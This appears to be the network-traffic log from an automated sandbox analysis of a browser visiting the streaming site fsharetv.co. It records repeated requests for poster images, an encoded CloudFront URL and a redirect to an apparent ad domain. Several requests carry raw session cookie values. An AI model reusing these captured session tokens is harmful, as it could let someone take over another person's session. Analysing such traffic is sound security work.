Source: global trafficHTTP traffic detected: GET /lMHl4TDlTFhYqBkQQHHEIAEBKfg4IXwg+XFZEHj9RUQsdOE8eGhdqU0MWFjwEdhEwOEAFSR5/CHg+IAgfRAMccRQFXxQtV1dEXilXU0RJalhUG0V4H0QJFycEWxsWKExTFQIgUhYMGXFUXwMRIFVRXEoKDB5JXX4JGA4RIl1fDgtpCwAXDGkLAEhIYgkVSj-ppCwAOESIPBFxLDhwCSQB6DRlcSnxYQAkUKU5VGxMlTRVLPnkKB1dLehwCSVAnUUQUFGkLc1xKfFVZEh1pCwAeHS9SX1BdfglTEQojVFVcSgoIAU5WfBcAV0hpCwAKGSpYQhBdfn8FSk9iCgZfDXEI HTTP/1.1Host: d2w9cdu84xc4eq.cloudfront.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /N/A HTTP/1.1Host: fsharetv.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
Source: global trafficHTTP traffic detected: GET /jwjzcdhlaa.jpg HTTP/1.1Host: images.fsharetv.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZWFjNGI2ODgtMTFmNi00NDU5LWIwNjEtZThmNjk0OTNlNWFiXkEyXkFqcGdeQXVyNjMwMjk0MTQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNWYxZjE3MGQtZWZmMC00NTFjLTlkZmUtODFkZDY1MGYyZWQ4XkEyXkFqcGdeQXVyNjM2NTM3ODA@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzEzM2IxY2EtZjc0MS00ODYwLTgzMGEtMTNjY2EwYzViYmFhXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjM3OTJiYTktNjNjMS00Yjc3LWE3ODktZjIxMDk1NzU1ZTQ3XkEyXkFqcGdeQXVyODU4MzMxNDg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNWYxZjE3MGQtZWZmMC00NTFjLTlkZmUtODFkZDY1MGYyZWQ4XkEyXkFqcGdeQXVyNjM2NTM3ODA@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNDU4MjYwMjg1OF5BMl5BanBnXkFtZTcwNjEwMDUyMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMGVhYmRlMjEtMTZhYy00ZTgyLWI5YzMtMTFmMzg2OWEwZWRhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOTMxNDVmNTQtNWQ5My00MjE0LWE2MzAtOTVlNzg5OWFmOTQ4XkEyXkFqcGdeQXVyMTQ3Njg3MQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNDA1ZDU3M2ItNTdmZC00NjlkLWJhN2UtYjY3YWI3Y2FhMThhXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZWQ3NWI5NDYtMGNiZS00MTNhLTk4ODItNWM2NTcyNjFiMTljL2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzEzM2IxY2EtZjc0MS00ODYwLTgzMGEtMTNjY2EwYzViYmFhXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjM3OTJiYTktNjNjMS00Yjc3LWE3ODktZjIxMDk1NzU1ZTQ3XkEyXkFqcGdeQXVyODU4MzMxNDg@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNmY5MGM2NWQtNGVkMi00ZmQ1LWFkZWMtYjRkYjhmNTRiNjY0XkEyXkFqcGdeQXVyMjUyNDk2ODc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTkzNzM0NzY5OF5BMl5BanBnXkFtZTcwODgyMzk3NA@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMGVhYmRlMjEtMTZhYy00ZTgyLWI5YzMtMTFmMzg2OWEwZWRhXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOGMyNWJhZmYtNGQxYi00Y2ZjLWJmNjktNTgzZWJjOTg4YjM3L2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjAzNzgzNDg5Nl5BMl5BanBnXkFtZTcwODYwNTIyMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNDA1ZDU3M2ItNTdmZC00NjlkLWJhN2UtYjY3YWI3Y2FhMThhXkEyXkFqcGdeQXVyMTQxNzMzNDI@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNDU4MjYwMjg1OF5BMl5BanBnXkFtZTcwNjEwMDUyMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNjE4NGU0MjgtMzgxYy00NzhmLWI3ZWItMTBlNGJmYmVhMGJiXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOTMxNDVmNTQtNWQ5My00MjE0LWE2MzAtOTVlNzg5OWFmOTQ4XkEyXkFqcGdeQXVyMTQ3Njg3MQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNzBjNjhhZDAtMmNjZS00YzM1LWE5ZDctNWJkNWQwOWFhMTkzXkEyXkFqcGdeQXVyNDUxNjc5NjY@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BZWQ3NWI5NDYtMGNiZS00MTNhLTk4ODItNWM2NTcyNjFiMTljL2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /M0xOQ0JSLiM3 HTTP/1.1Host: arketingefifortw.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNTgxOGZjYzMtMDkzOS00ZTA5LTg3MmUtM2IyMWRiMzQwYjMxXkEyXkFqcGdeQXVyNjMxODMyODU@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNmY5MGM2NWQtNGVkMi00ZmQ1LWFkZWMtYjRkYjhmNTRiNjY0XkEyXkFqcGdeQXVyMjUyNDk2ODc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: arketingefifortw.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36viewport-width: 1280sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"dpr: 1sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://arketingefifortw.com/M0xOQ0JSLiM3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALB=TDYilUxhsUoCOBa2e2mZLho4r1wbn7yH9WgppwaEQ2sjXUgJQr8q4Rm/GXpKF2lsD7wmzRd3FYKjEhxmOd+t15VEYIeH515YNAjrJWZf/e5fEp+/5KUaGhbaRYgH
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMTkzNzM0NzY5OF5BMl5BanBnXkFtZTcwODgyMzk3NA@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMDNlNDIyNGQtNWUwYy00MjZlLThmMmItZjEwMjEyM2E5OGQ5XkEyXkFqcGdeQXVyODk1MjAxNzQ@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BODk0NjBmZTYtMTBmMi00MDkzLTg2ZjYtMDVkOWY1NjYxMWY0XkEyXkFqcGdeQXVyMTY5Nzc4MDY@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BNjE4NGU0MjgtMzgxYy00NzhmLWI3ZWItMTBlNGJmYmVhMGJiXkEyXkFqcGc@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BYTk3OWJmZWUtYmZmZi00YmI5LWE4ZWQtODE0YjI0Mzk4MDkxL2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjAzNzgzNDg5Nl5BMl5BanBnXkFtZTcwODYwNTIyMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BOGMyNWJhZmYtNGQxYi00Y2ZjLWJmNjktNTgzZWJjOTg4YjM3L2ltYWdlXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/M/MV5BMjA5OTk3OTQzOF5BMl5BanBnXkFtZTcwNDcyODkyMQ@@._V1_SX300.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fsharetv.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
